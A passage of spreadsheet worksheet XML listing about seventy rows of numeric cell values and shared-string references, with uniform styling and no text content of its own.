      <c r="A33848" s="1">
        <v>10875.0</v>
      </c>
      <c r="B33848" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C33848" s="2" t="s">
        <v>32584</v>
      </c>
      <c r="D33848" s="2">
        <v>1.0</v>
      </c>
      <c r="E33848" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33848" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33849" ht="15.75" customHeight="1">
      <c r="A33849" s="1">
        <v>10889.0</v>
      </c>
      <c r="B33849" s="2">
        <v>1.6552784E7</v>
      </c>
      <c r="C33849" s="2" t="s">
        <v>32585</v>
      </c>
      <c r="D33849" s="2">
        <v>1.0</v>
      </c>
      <c r="E33849" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33849" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33850" ht="15.75" customHeight="1">
      <c r="A33850" s="1">
        <v>10904.0</v>
      </c>
      <c r="B33850" s="2">
        <v>1.6640477E7</v>
      </c>
      <c r="C33850" s="2" t="s">
        <v>32586</v>
      </c>
      <c r="D33850" s="2">
        <v>1.0</v>
      </c>
      <c r="E33850" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33850" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33851" ht="15.75" customHeight="1">
      <c r="A33851" s="1">
        <v>10937.0</v>
      </c>
      <c r="B33851" s="2">
        <v>1.6990926E7</v>
      </c>
      <c r="C33851" s="2" t="s">
        <v>32587</v>
      </c>
      <c r="D33851" s="2">
        <v>1.0</v>
      </c>
      <c r="E33851" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33851" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33852" ht="15.75" customHeight="1">
      <c r="A33852" s="1">
        <v>11012.0</v>
      </c>
      <c r="B33852" s="2">
        <v>1.7761876E7</v>
      </c>
      <c r="C33852" s="2" t="s">
        <v>32588</v>
      </c>
      <c r="D33852" s="2">
        <v>1.0</v>
      </c>
      <c r="E33852" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33852" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33853" ht="15.75" customHeight="1">
      <c r="A33853" s="1">
        <v>11061.0</v>
      </c>
      <c r="B33853" s="2">
        <v>1.8253291E7</v>
      </c>
      <c r="C33853" s="2" t="s">
        <v>32589</v>
      </c>
      <c r="D33853" s="2">
        <v>1.0</v>
      </c>
      <c r="E33853" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33853" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33854" ht="15.75" customHeight="1">
      <c r="A33854" s="1">
        <v>11081.0</v>
      </c>
      <c r="B33854" s="2">
        <v>1.8433083E7</v>
      </c>
      <c r="C33854" s="2" t="s">
        <v>32590</v>
      </c>
      <c r="D33854" s="2">
        <v>1.0</v>
      </c>
      <c r="E33854" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33854" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33855" ht="15.75" customHeight="1">
      <c r="A33855" s="1">
        <v>11114.0</v>
      </c>
      <c r="B33855" s="2">
        <v>1.8832676E7</v>
      </c>
      <c r="C33855" s="2" t="s">
        <v>32591</v>
      </c>
      <c r="D33855" s="2">
        <v>1.0</v>
      </c>
      <c r="E33855" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33855" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33856" ht="15.75" customHeight="1">
      <c r="A33856" s="1">
        <v>11125.0</v>
      </c>
      <c r="B33856" s="2">
        <v>1.9031651E7</v>
      </c>
      <c r="C33856" s="2" t="s">
        <v>32592</v>
      </c>
      <c r="D33856" s="2">
        <v>1.0</v>
      </c>
      <c r="E33856" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33856" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33857" ht="15.75" customHeight="1">
      <c r="A33857" s="1">
        <v>11176.0</v>
      </c>
      <c r="B33857" s="2">
        <v>1.9702189E7</v>
      </c>
      <c r="C33857" s="2" t="s">
        <v>32593</v>
      </c>
      <c r="D33857" s="2">
        <v>1.0</v>
      </c>
      <c r="E33857" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33857" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33858" ht="15.75" customHeight="1">
      <c r="A33858" s="1">
        <v>11220.0</v>
      </c>
      <c r="B33858" s="2">
        <v>2.0303155E7</v>
      </c>
      <c r="C33858" s="2" t="s">
        <v>32594</v>
      </c>
      <c r="D33858" s="2">
        <v>1.0</v>
      </c>
      <c r="E33858" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33858" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33859" ht="15.75" customHeight="1">
      <c r="A33859" s="1">
        <v>11233.0</v>
      </c>
      <c r="B33859" s="2">
        <v>2.0342261E7</v>
      </c>
      <c r="C33859" s="2" t="s">
        <v>32595</v>
      </c>
      <c r="D33859" s="2">
        <v>1.0</v>
      </c>
      <c r="E33859" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33859" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33860" ht="15.75" customHeight="1">
      <c r="A33860" s="1">
        <v>11239.0</v>
      </c>
      <c r="B33860" s="2">
        <v>2.0411155E7</v>
      </c>
      <c r="C33860" s="2" t="s">
        <v>32596</v>
      </c>
      <c r="D33860" s="2">
        <v>1.0</v>
      </c>
      <c r="E33860" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33860" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33861" ht="15.75" customHeight="1">
      <c r="A33861" s="1">
        <v>11240.0</v>
      </c>
      <c r="B33861" s="2">
        <v>2.0414753E7</v>
      </c>
      <c r="C33861" s="2" t="s">
        <v>32597</v>
      </c>
      <c r="D33861" s="2">
        <v>1.0</v>
      </c>
      <c r="E33861" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33861" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33862" ht="15.75" customHeight="1">
      <c r="A33862" s="1">
        <v>11244.0</v>
      </c>
      <c r="B33862" s="2">
        <v>2.0444064E7</v>
      </c>
      <c r="C33862" s="2" t="s">
        <v>32598</v>
      </c>
      <c r="D33862" s="2">
        <v>1.0</v>
      </c>
      <c r="E33862" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33862" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33863" ht="15.75" customHeight="1">
      <c r="A33863" s="1">
        <v>11294.0</v>
      </c>
      <c r="B33863" s="2">
        <v>2.0937085E7</v>
      </c>
      <c r="C33863" s="2" t="s">
        <v>32599</v>
      </c>
      <c r="D33863" s="2">
        <v>1.0</v>
      </c>
      <c r="E33863" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33863" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33864" ht="15.75" customHeight="1">
      <c r="A33864" s="1">
        <v>11318.0</v>
      </c>
      <c r="B33864" s="2">
        <v>2.1078442E7</v>
      </c>
      <c r="C33864" s="2" t="s">
        <v>32600</v>
      </c>
      <c r="D33864" s="2">
        <v>1.0</v>
      </c>
      <c r="E33864" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33864" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33865" ht="15.75" customHeight="1">
      <c r="A33865" s="1">
        <v>11332.0</v>
      </c>
      <c r="B33865" s="2">
        <v>2.1164401E7</v>
      </c>
      <c r="C33865" s="2" t="s">
        <v>32601</v>
      </c>
      <c r="D33865" s="2">
        <v>1.0</v>
      </c>
      <c r="E33865" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33865" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33866" ht="15.75" customHeight="1">
      <c r="A33866" s="1">
        <v>11419.0</v>
      </c>
      <c r="B33866" s="2">
        <v>2.1688356E7</v>
      </c>
      <c r="C33866" s="2" t="s">
        <v>32602</v>
      </c>
      <c r="D33866" s="2">
        <v>1.0</v>
      </c>
      <c r="E33866" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33866" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33867" ht="15.75" customHeight="1">
      <c r="A33867" s="1">
        <v>11485.0</v>
      </c>
      <c r="B33867" s="2">
        <v>2.2030222E7</v>
      </c>
      <c r="C33867" s="2" t="s">
        <v>32603</v>
      </c>
      <c r="D33867" s="2">
        <v>1.0</v>
      </c>
      <c r="E33867" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33867" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33868" ht="15.75" customHeight="1">
      <c r="A33868" s="1">
        <v>11630.0</v>
      </c>
      <c r="B33868" s="2">
        <v>2.3165502E7</v>
      </c>
      <c r="C33868" s="2" t="s">
        <v>32604</v>
      </c>
      <c r="D33868" s="2">
        <v>1.0</v>
      </c>
      <c r="E33868" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33868" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33869" ht="15.75" customHeight="1">
      <c r="A33869" s="1">
        <v>11681.0</v>
      </c>
      <c r="B33869" s="2">
        <v>2.3444499E7</v>
      </c>
      <c r="C33869" s="2" t="s">
        <v>32605</v>
      </c>
      <c r="D33869" s="2">
        <v>1.0</v>
      </c>
      <c r="E33869" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33869" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33870" ht="15.75" customHeight="1">
      <c r="A33870" s="1">
        <v>11706.0</v>
      </c>
      <c r="B33870" s="2">
        <v>2.3562761E7</v>
      </c>
      <c r="C33870" s="2" t="s">
        <v>32606</v>
      </c>
      <c r="D33870" s="2">
        <v>1.0</v>
      </c>
      <c r="E33870" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33870" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33871" ht="15.75" customHeight="1">
      <c r="A33871" s="1">
        <v>11733.0</v>
      </c>
      <c r="B33871" s="2">
        <v>2.3991729E7</v>
      </c>
      <c r="C33871" s="2" t="s">
        <v>32607</v>
      </c>
      <c r="D33871" s="2">
        <v>1.0</v>
      </c>
      <c r="E33871" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33871" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33872" ht="15.75" customHeight="1">
      <c r="A33872" s="1">
        <v>11769.0</v>
      </c>
      <c r="B33872" s="2">
        <v>2.4226298E7</v>
      </c>
      <c r="C33872" s="2" t="s">
        <v>32608</v>
      </c>
      <c r="D33872" s="2">
        <v>1.0</v>
      </c>
      <c r="E33872" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33872" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33873" ht="15.75" customHeight="1">
      <c r="A33873" s="1">
        <v>11806.0</v>
      </c>
      <c r="B33873" s="2">
        <v>2.4434537E7</v>
      </c>
      <c r="C33873" s="2" t="s">
        <v>32609</v>
      </c>
      <c r="D33873" s="2">
        <v>1.0</v>
      </c>
      <c r="E33873" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33873" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33874" ht="15.75" customHeight="1">
      <c r="A33874" s="1">
        <v>11859.0</v>
      </c>
      <c r="B33874" s="2">
        <v>2.4839869E7</v>
      </c>
      <c r="C33874" s="2" t="s">
        <v>32610</v>
      </c>
      <c r="D33874" s="2">
        <v>1.0</v>
      </c>
      <c r="E33874" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33874" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33875" ht="15.75" customHeight="1">
      <c r="A33875" s="1">
        <v>11865.0</v>
      </c>
      <c r="B33875" s="2">
        <v>2.487876E7</v>
      </c>
      <c r="C33875" s="2" t="s">
        <v>32611</v>
      </c>
      <c r="D33875" s="2">
        <v>1.0</v>
      </c>
      <c r="E33875" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33875" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33876" ht="15.75" customHeight="1">
      <c r="A33876" s="1">
        <v>11897.0</v>
      </c>
      <c r="B33876" s="2">
        <v>2.5172531E7</v>
      </c>
      <c r="C33876" s="2" t="s">
        <v>32612</v>
      </c>
      <c r="D33876" s="2">
        <v>1.0</v>
      </c>
      <c r="E33876" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33876" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33877" ht="15.75" customHeight="1">
      <c r="A33877" s="1">
        <v>11921.0</v>
      </c>
      <c r="B33877" s="2">
        <v>2.532376E7</v>
      </c>
      <c r="C33877" s="2" t="s">
        <v>32613</v>
      </c>
      <c r="D33877" s="2">
        <v>1.0</v>
      </c>
      <c r="E33877" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33877" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33878" ht="15.75" customHeight="1">
      <c r="A33878" s="1">
        <v>11934.0</v>
      </c>
      <c r="B33878" s="2">
        <v>2.5451464E7</v>
      </c>
      <c r="C33878" s="2" t="s">
        <v>32614</v>
      </c>
      <c r="D33878" s="2">
        <v>1.0</v>
      </c>
      <c r="E33878" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33878" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33879" ht="15.75" customHeight="1">
      <c r="A33879" s="1">
        <v>11976.0</v>
      </c>
      <c r="B33879" s="2">
        <v>2.5781952E7</v>
      </c>
      <c r="C33879" s="2" t="s">
        <v>32615</v>
      </c>
      <c r="D33879" s="2">
        <v>1.0</v>
      </c>
      <c r="E33879" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33879" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33880" ht="15.75" customHeight="1">
      <c r="A33880" s="1">
        <v>11990.0</v>
      </c>
      <c r="B33880" s="2">
        <v>2.5859834E7</v>
      </c>
      <c r="C33880" s="2" t="s">
        <v>32616</v>
      </c>
      <c r="D33880" s="2">
        <v>1.0</v>
      </c>
      <c r="E33880" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33880" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33881" ht="15.75" customHeight="1">
      <c r="A33881" s="1">
        <v>12063.0</v>
      </c>
      <c r="B33881" s="2">
        <v>2.6527438E7</v>
      </c>
      <c r="C33881" s="2" t="s">
        <v>32617</v>
      </c>
      <c r="D33881" s="2">
        <v>1.0</v>
      </c>
      <c r="E33881" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33881" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33882" ht="15.75" customHeight="1">
      <c r="A33882" s="1">
        <v>12110.0</v>
      </c>
      <c r="B33882" s="2">
        <v>2.6874068E7</v>
      </c>
      <c r="C33882" s="2" t="s">
        <v>32618</v>
      </c>
      <c r="D33882" s="2">
        <v>1.0</v>
      </c>
      <c r="E33882" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33882" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33883" ht="15.75" customHeight="1">
      <c r="A33883" s="1">
        <v>12117.0</v>
      </c>
      <c r="B33883" s="2">
        <v>2.6880732E7</v>
      </c>
      <c r="C33883" s="2" t="s">
        <v>32619</v>
      </c>
      <c r="D33883" s="2">
        <v>1.0</v>
      </c>
      <c r="E33883" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33883" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33884" ht="15.75" customHeight="1">
      <c r="A33884" s="1">
        <v>12131.0</v>
      </c>
      <c r="B33884" s="2">
        <v>2.694134E7</v>
      </c>
      <c r="C33884" s="2" t="s">
        <v>32620</v>
      </c>
      <c r="D33884" s="2">
        <v>1.0</v>
      </c>
      <c r="E33884" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33884" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33885" ht="15.75" customHeight="1">
      <c r="A33885" s="1">
        <v>12135.0</v>
      </c>
      <c r="B33885" s="2">
        <v>2.702954E7</v>
      </c>
      <c r="C33885" s="2" t="s">
        <v>32621</v>
      </c>
      <c r="D33885" s="2">
        <v>1.0</v>
      </c>
      <c r="E33885" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33885" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33886" ht="15.75" customHeight="1">
      <c r="A33886" s="1">
        <v>12137.0</v>
      </c>
      <c r="B33886" s="2">
        <v>2.7070502E7</v>
      </c>
      <c r="C33886" s="2" t="s">
        <v>32622</v>
      </c>
      <c r="D33886" s="2">
        <v>1.0</v>
      </c>
      <c r="E33886" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33886" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33887" ht="15.75" customHeight="1">
      <c r="A33887" s="1">
        <v>12182.0</v>
      </c>
      <c r="B33887" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C33887" s="2" t="s">
        <v>32623</v>
      </c>
      <c r="D33887" s="2">
        <v>1.0</v>
      </c>
      <c r="E33887" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33887" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33888" ht="15.75" customHeight="1">
      <c r="A33888" s="1">
        <v>12247.0</v>
      </c>
      <c r="B33888" s="2">
        <v>2.7896207E7</v>
      </c>
      <c r="C33888" s="2" t="s">
        <v>32624</v>
      </c>
      <c r="D33888" s="2">
        <v>1.0</v>
      </c>
      <c r="E33888" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33888" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33889" ht="15.75" customHeight="1">
      <c r="A33889" s="1">
        <v>12268.0</v>
      </c>
      <c r="B33889" s="2">
        <v>2.8090765E7</v>
      </c>
      <c r="C33889" s="2" t="s">
        <v>32625</v>
      </c>
      <c r="D33889" s="2">
        <v>1.0</v>
      </c>
      <c r="E33889" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33889" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33890" ht="15.75" customHeight="1">
      <c r="A33890" s="1">
        <v>12291.0</v>
      </c>
      <c r="B33890" s="2">
        <v>2.8248136E7</v>
      </c>
      <c r="C33890" s="2" t="s">
        <v>32626</v>
      </c>
      <c r="D33890" s="2">
        <v>1.0</v>
      </c>
      <c r="E33890" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33890" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33891" ht="15.75" customHeight="1">
      <c r="A33891" s="1">
        <v>12302.0</v>
      </c>
      <c r="B33891" s="2">
        <v>2.8344773E7</v>
      </c>
      <c r="C33891" s="2" t="s">
        <v>32627</v>
      </c>
      <c r="D33891" s="2">
        <v>1.0</v>
      </c>
      <c r="E33891" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33891" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33892" ht="15.75" customHeight="1">
      <c r="A33892" s="1">
        <v>12312.0</v>
      </c>
      <c r="B33892" s="2">
        <v>2.8402227E7</v>
      </c>
      <c r="C33892" s="2" t="s">
        <v>32628</v>
      </c>
      <c r="D33892" s="2">
        <v>1.0</v>
      </c>
      <c r="E33892" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33892" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33893" ht="15.75" customHeight="1">
      <c r="A33893" s="1">
        <v>12314.0</v>
      </c>
      <c r="B33893" s="2">
        <v>2.8425453E7</v>
      </c>
      <c r="C33893" s="2" t="s">
        <v>32629</v>
      </c>
      <c r="D33893" s="2">
        <v>1.0</v>
      </c>
      <c r="E33893" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33893" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33894" ht="15.75" customHeight="1">
      <c r="A33894" s="1">
        <v>12378.0</v>
      </c>
      <c r="B33894" s="2">
        <v>2.882754E7</v>
      </c>
      <c r="C33894" s="2" t="s">
        <v>32630</v>
      </c>
      <c r="D33894" s="2">
        <v>1.0</v>
      </c>
      <c r="E33894" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33894" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33895" ht="15.75" customHeight="1">
      <c r="A33895" s="1">
        <v>12401.0</v>
      </c>
      <c r="B33895" s="2">
        <v>2.8946033E7</v>
      </c>
      <c r="C33895" s="2" t="s">
        <v>32631</v>
      </c>
      <c r="D33895" s="2">
        <v>1.0</v>
      </c>
      <c r="E33895" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33895" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33896" ht="15.75" customHeight="1">
      <c r="A33896" s="1">
        <v>12479.0</v>
      </c>
      <c r="B33896" s="2">
        <v>2.948136E7</v>
      </c>
      <c r="C33896" s="2" t="s">
        <v>32632</v>
      </c>
      <c r="D33896" s="2">
        <v>1.0</v>
      </c>
      <c r="E33896" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33896" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33897" ht="15.75" customHeight="1">
      <c r="A33897" s="1">
        <v>12484.0</v>
      </c>
      <c r="B33897" s="2">
        <v>2.9510379E7</v>
      </c>
      <c r="C33897" s="2" t="s">
        <v>32633</v>
      </c>
      <c r="D33897" s="2">
        <v>1.0</v>
      </c>
      <c r="E33897" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33897" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33898" ht="15.75" customHeight="1">
      <c r="A33898" s="1">
        <v>12539.0</v>
      </c>
      <c r="B33898" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C33898" s="2" t="s">
        <v>32634</v>
      </c>
      <c r="D33898" s="2">
        <v>1.0</v>
      </c>
      <c r="E33898" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33898" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33899" ht="15.75" customHeight="1">
      <c r="A33899" s="1">
        <v>12572.0</v>
      </c>
      <c r="B33899" s="2">
        <v>2.9996443E7</v>
      </c>
      <c r="C33899" s="2" t="s">
        <v>32635</v>
      </c>
      <c r="D33899" s="2">
        <v>1.0</v>
      </c>
      <c r="E33899" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33899" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33900" ht="15.75" customHeight="1">
      <c r="A33900" s="1">
        <v>12620.0</v>
      </c>
      <c r="B33900" s="2">
        <v>3.0223356E7</v>
      </c>
      <c r="C33900" s="2" t="s">
        <v>32636</v>
      </c>
      <c r="D33900" s="2">
        <v>1.0</v>
      </c>
      <c r="E33900" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33900" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33901" ht="15.75" customHeight="1">
      <c r="A33901" s="1">
        <v>12626.0</v>
      </c>
      <c r="B33901" s="2">
        <v>3.0238064E7</v>
      </c>
      <c r="C33901" s="2" t="s">
        <v>32637</v>
      </c>
      <c r="D33901" s="2">
        <v>1.0</v>
      </c>
      <c r="E33901" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33901" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33902" ht="15.75" customHeight="1">
      <c r="A33902" s="1">
        <v>12636.0</v>
      </c>
      <c r="B33902" s="2">
        <v>3.0309161E7</v>
      </c>
      <c r="C33902" s="2" t="s">
        <v>32638</v>
      </c>
      <c r="D33902" s="2">
        <v>1.0</v>
      </c>
      <c r="E33902" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33902" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33903" ht="15.75" customHeight="1">
      <c r="A33903" s="1">
        <v>12704.0</v>
      </c>
      <c r="B33903" s="2">
        <v>3.0811531E7</v>
      </c>
      <c r="C33903" s="2" t="s">
        <v>32639</v>
      </c>
      <c r="D33903" s="2">
        <v>1.0</v>
      </c>
      <c r="E33903" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33903" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33904" ht="15.75" customHeight="1">
      <c r="A33904" s="1">
        <v>12721.0</v>
      </c>
      <c r="B33904" s="2">
        <v>3.087214E7</v>
      </c>
      <c r="C33904" s="2" t="s">
        <v>32640</v>
      </c>
      <c r="D33904" s="2">
        <v>1.0</v>
      </c>
      <c r="E33904" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33904" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33905" ht="15.75" customHeight="1">
      <c r="A33905" s="1">
        <v>12741.0</v>
      </c>
      <c r="B33905" s="2">
        <v>3.1074839E7</v>
      </c>
      <c r="C33905" s="2" t="s">
        <v>32641</v>
      </c>
      <c r="D33905" s="2">
        <v>1.0</v>
      </c>
      <c r="E33905" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33905" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33906" ht="15.75" customHeight="1">
      <c r="A33906" s="1">
        <v>12871.0</v>
      </c>
      <c r="B33906" s="2">
        <v>3.1918004E7</v>
      </c>
      <c r="C33906" s="2" t="s">
        <v>32642</v>
      </c>
      <c r="D33906" s="2">
        <v>1.0</v>
      </c>
      <c r="E33906" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33906" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33907" ht="15.75" customHeight="1">
      <c r="A33907" s="1">
        <v>12895.0</v>
      </c>
      <c r="B33907" s="2">
        <v>3.2059114E7</v>
      </c>
      <c r="C33907" s="2" t="s">
        <v>32643</v>
      </c>
      <c r="D33907" s="2">
        <v>1.0</v>
      </c>
      <c r="E33907" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33907" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33908" ht="15.75" customHeight="1">
      <c r="A33908" s="1">
        <v>12942.0</v>
      </c>
      <c r="B33908" s="2">
        <v>3.2375855E7</v>
      </c>
      <c r="C33908" s="2" t="s">
        <v>32644</v>
      </c>
      <c r="D33908" s="2">
        <v>1.0</v>
      </c>
      <c r="E33908" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33908" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33909" ht="15.75" customHeight="1">
      <c r="A33909" s="1">
        <v>12947.0</v>
      </c>
      <c r="B33909" s="2">
        <v>3.2377158E7</v>
      </c>
      <c r="C33909" s="2" t="s">
        <v>32645</v>
      </c>
      <c r="D33909" s="2">
        <v>1.0</v>
      </c>
      <c r="E33909" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33909" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33910" ht="15.75" customHeight="1">
      <c r="A33910" s="1">
        <v>13013.0</v>
      </c>
      <c r="B33910" s="2">
        <v>3.29001E7</v>
      </c>
      <c r="C33910" s="2" t="s">
        <v>32646</v>
      </c>
      <c r="D33910" s="2">
        <v>1.0</v>
      </c>
      <c r="E33910" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33910" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33911" ht="15.75" customHeight="1">
      <c r="A33911" s="1">
        <v>13031.0</v>
      </c>
      <c r="B33911" s="2">
        <v>3.2951776E7</v>
      </c>
      <c r="C33911" s="2" t="s">
        <v>32647</v>
      </c>
      <c r="D33911" s="2">
        <v>1.0</v>
      </c>
      <c r="E33911" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33911" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33912" ht="15.75" customHeight="1">
      <c r="A33912" s="1">
        <v>13068.0</v>
      </c>
      <c r="B33912" s="2">
        <v>3.3324951E7</v>
      </c>
      <c r="C33912" s="2" t="s">
        <v>32648</v>
      </c>
      <c r="D33912" s="2">
        <v>1.0</v>
      </c>
      <c r="E33912" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33912" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33913" ht="15.75" customHeight="1">
      <c r="A33913" s="1">
        <v>13069.0</v>
      </c>
      <c r="B33913" s="2">
        <v>3.3324951E7</v>
      </c>
      <c r="C33913" s="2" t="s">
        <v>32649</v>
      </c>
      <c r="D33913" s="2">
        <v>1.0</v>
      </c>
      <c r="E33913" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33913" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33914" ht="15.75" customHeight="1">
      <c r="A33914" s="1">
        <v>13152.0</v>
      </c>
      <c r="B33914" s="2">
        <v>3.3819031E7</v>
      </c>
      <c r="C33914" s="2" t="s">
        <v>32650</v>
      </c>
      <c r="D33914" s="2">
        <v>1.0</v>
      </c>
      <c r="E33914" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33914" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33915" ht="15.75" customHeight="1">
